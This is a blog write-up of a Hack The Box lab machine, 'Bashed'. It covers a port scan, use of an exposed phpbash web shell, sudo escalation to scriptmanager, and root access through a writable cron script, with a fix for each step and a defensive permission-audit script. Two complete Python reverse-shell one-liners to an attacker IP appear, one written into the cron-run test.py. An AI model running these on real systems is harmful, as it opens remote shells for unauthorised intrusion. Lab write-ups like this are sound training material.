Lonely Nova's Workshop

Report - HTB bashed Report

Nova_ 2023. 4. 17. 17:38

1. port scan result

 

IP Address Port
10.10.10.68 80

 

2. initial access - phpbash.php

 

Vulnerability Explanation : I scanned the port. I used gobuster to find directories. I found phpbash.php in the /var directory. This PHP file served a bash program as the www-data user. There is a picture below.


Vulnerability Fix : If possible, delete the phpbash.php file.

Severity : critical

Steps to reproduce the attack : Upload reverse_web_shell to /uploads and connect to /uploads/reverse_web_shell. I get a reverse shell.

 

Post-Exploitation : There is a screenshot below.

 

3. lateral movement - vulnerable sudo option

Vulnerability Explanation : I scanned for vulnerabilities for lateral movement. I found out that I can use privileges as scriptmanager from the "sudo -l" command.

screenshot :

With this option, the www-data user can escalate privileges to scriptmanager with no password.


Vulnerability Fix : Fix the sudoers file to remove the no-password option.

 

Severity : critical

Steps to reproduce the attack : 

sudo -u scriptmanager python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",445));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

screenshot:


post-exploitation :

 

4. Privilege Escalation - root cronjob vulnerability

Vulnerability Explanation : This vulnerability is a misconfigured cron job running as root. I scanned for files related to scriptmanager and found the /scripts directory. I changed directory into /scripts and scanned the files. I found out that root executes test.py regularly, but the write permission on test.py belongs to scriptmanager.

 

Vulnerability Fix : Change the owner of test.py to root.
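
A way to verify the fix above, as an added example that is not part of the original report. It goes one step beyond the file itself: changing the owner of test.py only helps if every directory on the path is also controlled by root, because whoever owns a directory can rename or replace the files in it. The function name and the trusted_uids and stop_at parameters are assumptions of this example.

```python
import os
import stat
import sys

def writable_by_untrusted(path, trusted_uids=(0,), stop_at="/"):
    """Return [(component, reason), ...] for each part of `path`, from the
    file up to `stop_at`, that a user outside `trusted_uids` could change."""
    findings = []
    current = os.path.realpath(path)
    stop_at = os.path.realpath(stop_at)
    while True:
        st = os.stat(current)
        mode = stat.S_IMODE(st.st_mode)
        if st.st_uid not in trusted_uids:
            # The owner can rewrite a file, or rename/replace entries in a directory.
            findings.append((current, "owned by uid %d" % st.st_uid))
        sticky_dir = stat.S_ISDIR(st.st_mode) and mode & stat.S_ISVTX
        # A sticky directory such as /tmp stops users from replacing entries
        # they do not own, so group/other write is tolerated there.
        # Group write is flagged conservatively, whatever the group is.
        if mode & (stat.S_IWGRP | stat.S_IWOTH) and not sticky_dir:
            findings.append((current, "group/other writable, mode %o" % mode))
        parent = os.path.dirname(current)
        if current == stop_at or parent == current:
            break
        current = parent
    return findings

if __name__ == "__main__":
    # Usage: python3 audit_job.py /scripts/test.py   (path taken from the report)
    for target in sys.argv[1:]:
        for component, reason in writable_by_untrusted(target):
            print("%s: %s: %s" % (target, component, reason))
```

An empty result means neither the script nor any directory above it can be modified by a non-root account; any finding is a path by which the root cron job could still be made to run changed code.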

 

Severity : critical

Steps to reproduce the attack :

Execute the command below.

echo "import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.4',447));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn('/bin/sh')" > test.py

 

post-exploitation : 
